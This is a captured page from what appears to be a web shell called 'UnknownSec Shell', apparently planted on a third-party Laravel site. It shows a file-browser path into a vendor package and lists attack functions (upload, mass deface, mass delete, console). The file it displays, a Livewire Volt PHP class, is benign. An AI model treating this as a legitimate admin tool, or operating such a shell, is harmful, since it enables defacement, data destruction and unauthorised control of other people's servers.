shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
socialite.brannanatkinson.com
/
vendor
/
livewire
/
volt
/
src
/
Methods
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
ActionMethod.php
<?php namespace Livewire\Volt\Methods; use Closure; use Livewire\Attributes\Renderless; class ActionMethod extends Method { /** * Create a method instance. */ public static function make(Closure $closure): static { return new static($closure); } /** * Make the method renderless. */ public function renderless(): static { return $this->attribute(Renderless::class); } }
© 2026 UnknownSec